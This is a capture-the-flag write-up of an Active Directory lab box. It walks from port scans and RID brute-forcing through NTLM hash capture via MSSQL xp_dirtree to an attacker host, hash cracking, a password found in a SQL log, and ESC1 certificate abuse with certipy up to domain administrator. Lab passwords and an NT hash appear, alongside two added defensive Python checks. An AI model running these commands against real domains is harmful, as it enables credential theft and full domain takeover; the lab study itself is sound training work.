Tracks-AD-Escape

AD
17k words

nmap

└─$ sudo nmap -sS 10.10.11.202 -p- --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 03:48 EST
Nmap scan report for 10.10.11.202
Host is up (0.18s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49691/tcp open unknown
49692/tcp open unknown
49710/tcp open unknown
49726/tcp open unknown

└─$ sudo nmap -sU 10.10.11.202 --top-ports=200 --min-rate=6000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 03:50 EST
Nmap scan report for 10.10.11.202
Host is up (0.15s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

ldap

└─$ ldapsearch -x -H ldap://10.10.11.202 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=sequel,DC=htb
ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=sequel,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=sequel,DC=htb
namingContexts: CN=Configuration,DC=sequel,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 159856
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=sequel,DC=htb
dnsHostName: dc.sequel.htb
defaultNamingContext: DC=sequel,DC=htb
currentTime: 20241229163620.0Z
configurationNamingContext: CN=Configuration,DC=sequel,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


dc.sequel.htb

to User

SMB allows anonymous access, so we can brute-force RIDs.

└─$ crackmapexec smb 10.10.11.202 -u anonymous -p '' --rid-brute=10000
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\anonymous:
SMB 10.10.11.202 445 DC [+] Brute forcing RIDs
SMB 10.10.11.202 445 DC 498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 500: sequel\Administrator (SidTypeUser)
SMB 10.10.11.202 445 DC 501: sequel\Guest (SidTypeUser)
SMB 10.10.11.202 445 DC 502: sequel\krbtgt (SidTypeUser)
SMB 10.10.11.202 445 DC 512: sequel\Domain Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 513: sequel\Domain Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 514: sequel\Domain Guests (SidTypeGroup)
SMB 10.10.11.202 445 DC 515: sequel\Domain Computers (SidTypeGroup)
SMB 10.10.11.202 445 DC 516: sequel\Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 517: sequel\Cert Publishers (SidTypeAlias)
SMB 10.10.11.202 445 DC 518: sequel\Schema Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 519: sequel\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.202 445 DC 521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 525: sequel\Protected Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 526: sequel\Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.202 445 DC 571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 1000: sequel\DC$ (SidTypeUser)
SMB 10.10.11.202 445 DC 1101: sequel\DnsAdmins (SidTypeAlias)
SMB 10.10.11.202 445 DC 1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.202 445 DC 1103: sequel\Tom.Henn (SidTypeUser)
SMB 10.10.11.202 445 DC 1104: sequel\Brandon.Brown (SidTypeUser)
SMB 10.10.11.202 445 DC 1105: sequel\Ryan.Cooper (SidTypeUser)
SMB 10.10.11.202 445 DC 1106: sequel\sql_svc (SidTypeUser)
SMB 10.10.11.202 445 DC 1107: sequel\James.Roberts (SidTypeUser)
SMB 10.10.11.202 445 DC 1108: sequel\Nicole.Thompson (SidTypeUser)
SMB 10.10.11.202 445 DC 1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)

An SMB share holds a PDF; at its end there is an account and password that give us access to MSSQL.


PublicUser/GuestUserCantWrite1

sudo responder -I tun0

Connect to MSSQL directly, use xp_dirtree to get an NTLMv2 hash back, and try cracking it.

└─$ impacket-mssqlclient -dc-ip 10.10.11.202 sequel.htb/'PublicUser':'GuestUserCantWrite1'@10.10.11.202                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands

SQL (PublicUser guest@msdb)> xp_dirtree \\10.10.16.10\a
[%] exec master.sys.xp_dirtree '\\10.10.16.10\a',1,1

Hash received:

└─$ sudo responder -I tun0

sql_svc::sequel:7c386faedcf6e53f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

Cracked sql_svc's password: REGGIE1234ronnie

 └─$ hashcat hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

SQL_SVC::sequel:7c386faedcf6e53f:8fb4214ce21cf4ad9d37f827cf0ce884:010100000000000000fa2248eb59db01c33e717112dba1bb0000000002000800500037005600470001001e00570049004e002d0039005a0038003500380050004900570039003100410004003400570049004e002d0039005a003800350038005000490057003900310041002e0050003700560047002e004c004f00430041004c000300140050003700560047002e004c004f00430041004c000500140050003700560047002e004c004f00430041004c000700080000fa2248eb59db0106000400020000000800300030000000000000000000000000300000dcf539f51bc83df6877de74ed2b8c1b81c6196a8831d52eff7efa387e42dac490a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310030000000000000000000:REGGIE1234ronnie

Verify that the credential works:

└─$ kerbrute passwordspray userlist 'REGGIE1234ronnie' --dc 10.10.11.202 -d sequel.htb 

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/29/24 - Ronnie Flathers @ropnop

2024/12/29 12:20:16 > Using KDC(s):
2024/12/29 12:20:16 > 10.10.11.202:88

2024/12/29 12:20:17 > [+] VALID LOGIN: sql_svc@sequel.htb:REGGIE1234ronnie
2024/12/29 12:20:17 > Done! Tested 10 logins (1 successes) in 0.676 seconds

After logging in via WinRM, the SQL Server log directory holds a backup of the ERRORLOG.

*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK  

2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

Here we can see that the user Ryan.Cooper failed to log in, and immediately afterwards a "user" named NuclearMosquito3 also failed to log in; presumably NuclearMosquito3 is Ryan.Cooper's password, typed into the username field by mistake.
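The pattern above (a failed logon for a real account followed within a fraction of a second, from the same client, by a failed logon for a string that is not an account) is exactly what a log review should catch, because the password is then sitting in a world-readable ERRORLOG. As an added example, not part of this writeup, the following Python parses SQL Server ERRORLOG failed-logon lines and flags that pattern. The sample text is constructed from the three lines quoted above plus two benign lines; the `known_logins` set stands in for the output of `SELECT name FROM sys.sql_logins` and is an assumption of the example.

```python
import re
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed sample input: the three ERRORLOG.BAK lines quoted above, plus two
# extra failed logons written for this example to show the benign case.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:44:01.10 Logon       Logon failed for user 'sequel.htb\\Tom.Henn'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2022-11-18 13:44:09.30 Logon       Logon failed for user 'sequel.htb\\Tom.Henn'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
"""

# One "Logon failed for user" line: timestamp, the login that was tried, client address.
FAILED_LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text: str) -> List[Dict]:
    """Extract failed-logon events (error 18456) from ERRORLOG text, in file order."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGON_RE.match(line)
        if not m:
            continue  # "Error: 18456, Severity ..." and unrelated lines carry no login name
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f"),
            "user": m.group("user"),
            "client": m.group("client"),
        })
    return events


def is_known_login(name: str, known_logins: Set[str]) -> bool:
    """Domain-qualified names (DOMAIN\\user or user@domain) or names present in the
    SQL login list count as real logins; anything else is an unknown string."""
    return "\\" in name or "@" in name or name.lower() in {k.lower() for k in known_logins}


def find_password_in_username(events: List[Dict], known_logins: Set[str],
                              window_seconds: float = 5.0) -> List[Tuple[str, str, datetime]]:
    """Flag a failed logon for a known login followed, from the same client within
    window_seconds, by a failed logon for an unknown "user": the classic sign that
    a password was typed into the username field and is now sitting in the log."""
    findings = []
    for prev, cur in zip(events, events[1:]):
        gap = (cur["ts"] - prev["ts"]).total_seconds()
        if (prev["client"] == cur["client"]
                and 0 <= gap <= window_seconds
                and is_known_login(prev["user"], known_logins)
                and not is_known_login(cur["user"], known_logins)):
            findings.append((prev["user"], cur["user"], cur["ts"]))
    return findings


if __name__ == "__main__":
    # "sa" stands in for the real SQL login list (assumption of this example).
    for account, leaked, when in find_password_in_username(
            parse_failed_logons(SAMPLE_ERRORLOG), known_logins={"sa"}):
        print(f"{when}: possible password for {account} logged as username {leaked!r}")
```

Plain SQL logins that are not in `known_logins` will also be flagged, so feed the function the real login list; the time window and same-client check are what keep unrelated failures apart.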

sequel.htb\Ryan.Cooper NuclearMosquito3

Log in as Ryan to get user.txt.

to Root

If you have the newer version of BloodHound, running the collector would show the ADCS-related information, but I haven't updated to the new version.

https://github.com/SpecterOps/BloodHound-Legacy

When enumerating ADCS here, ESC1 shows up.

└─$ certipy find -u Ryan.Cooper -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Saved BloodHound data to '20241229130432_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241229130432_Certipy.txt'
[*] Saved JSON output to '20241229130432_Certipy.json'
------------------------------------------------------------
└─$ cat 20241229130432_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
Enrollment Rights               : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins

I won't elaborate on ESC1 here; it is described in more detail in the Authority writeup.

The enrollment rights include Domain Users, so the current Ryan.Cooper user is enough.
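From the defender's side, the same template attributes that certipy prints can be audited directly. As an added example (not part of this writeup or of Certipy), the following Python encodes the ESC1 preconditions and runs them over the UserAuthentication template fields shown above, then over a copy with the usual fixes applied. The dictionary key names and the list of low-privilege groups are this example's own assumptions, not Certipy's JSON schema.

```python
from typing import Dict, List

# Principals that every (or nearly every) domain account belongs to; enrollment
# rights granted to any of these make a template reachable by low-privileged users.
# This set is an assumption of the example; extend it with your own broad groups.
LOW_PRIV_PRINCIPALS = {"domain users", "domain computers", "authenticated users",
                       "everyone", "users"}

# EKUs that let the resulting certificate be used for Kerberos/PKINIT logon.
AUTH_EKUS = {"client authentication", "pkinit client authentication",
             "smart card logon", "any purpose"}

# Constructed from the certipy output above: the UserAuthentication template's
# relevant fields, in the key names this example uses (not certipy's JSON schema).
USER_AUTHENTICATION = {
    "name": "UserAuthentication",
    "enabled": True,
    "extended_key_usage": ["Client Authentication", "Secure Email", "Encrypting File System"],
    "enrollee_supplies_subject": True,
    "requires_manager_approval": False,
    "authorized_signatures_required": 0,
    "enrollment_rights": ["SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Domain Users",
                          "SEQUEL.HTB\\Enterprise Admins"],
}


def _short(principal: str) -> str:
    """'SEQUEL.HTB\\Domain Users' -> 'domain users'"""
    return principal.split("\\")[-1].lower()


def esc1_check(template: Dict) -> Dict:
    """Return which ESC1 preconditions the template meets. All must hold for ESC1:
    enabled, an authentication EKU (an empty EKU list means any purpose),
    enrollee supplies the subject/SAN, no manager approval, no authorized
    signatures, and enrollment rights for a low-privileged principal."""
    ekus = {e.lower() for e in template.get("extended_key_usage", [])}
    low_priv = [p for p in template.get("enrollment_rights", [])
                if _short(p) in LOW_PRIV_PRINCIPALS]
    conditions = {
        "template enabled": bool(template.get("enabled")),
        "authentication EKU present": not ekus or bool(ekus & AUTH_EKUS),
        "enrollee supplies subject": bool(template.get("enrollee_supplies_subject")),
        "no manager approval": not template.get("requires_manager_approval", False),
        "no authorized signatures": template.get("authorized_signatures_required", 0) == 0,
        "low-privileged enrollment rights": bool(low_priv),
    }
    missing = [name for name, ok in conditions.items() if not ok]
    return {"template": template["name"], "vulnerable": not missing,
            "low_priv_enrollers": low_priv, "missing": missing}


def remediated(template: Dict) -> Dict:
    """Copy of the template with the two usual fixes: the CA builds the subject
    from the requester's AD object instead of the request, and a certificate
    manager must approve each request. Enrollment rights are left unchanged."""
    fixed = dict(template)
    fixed["enrollee_supplies_subject"] = False
    fixed["requires_manager_approval"] = True
    return fixed


if __name__ == "__main__":
    for t in (USER_AUTHENTICATION, remediated(USER_AUTHENTICATION)):
        r = esc1_check(t)
        print(f"{r['template']}: ESC1={r['vulnerable']} "
              f"low-priv enrollers={r['low_priv_enrollers']} missing={r['missing']}")
```

Either fix on its own already breaks the chain, which is why `remediated` reports two unmet conditions; removing Domain Users from the enrollment rights would be a third, independent fix.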

└─$ certipy req -u 'Ryan.Cooper' -p 'NuclearMosquito3' -template 'UserAuthentication' -ca 'sequel-DC-CA' -dc-ip 10.10.11.202 -upn 'administrator'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

After getting the certificate I used PassTheCert to change the admin's password; RBCD, adding a user, or adding to a group would all work too, it's a matter of preference. When I first did the box I wanted to use PKINIT to get the NT hash, but the machine broke; after some back and forth with HTB support it got fixed, so I'm adding those two here.


1.certipy

└─$ certipy auth -pfx ./administrator.pfx -domain sequel.htb  -username administrator                                                                                 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b

2.Rubeus

.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Documents\cert.pfx

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::417c:531c:96f6:8294%4:88
....

PassTheCert part

└─$ python3 ~/tools/wintools/PassTheCert/Python/passthecert.py -crt administrator.crt -key administrator.key -dc-ip 10.10.11.202 -action ldap-shell -domain sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands

# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=sequel,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!

Then just log in directly.

└─$ evil-winrm -u administrator -i 10.10.11.202 -p 'Password@123'                  

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\desktop> cat r*
bd2ccdfb331f198854b3458a1c0fa547
*Evil-WinRM* PS C:\Users\Administrator\desktop> whoami
sequel\administrator

get Root


Not much to say; it's all basic knowledge. Apart from the password being easy to miss, the whole thing is overly basic.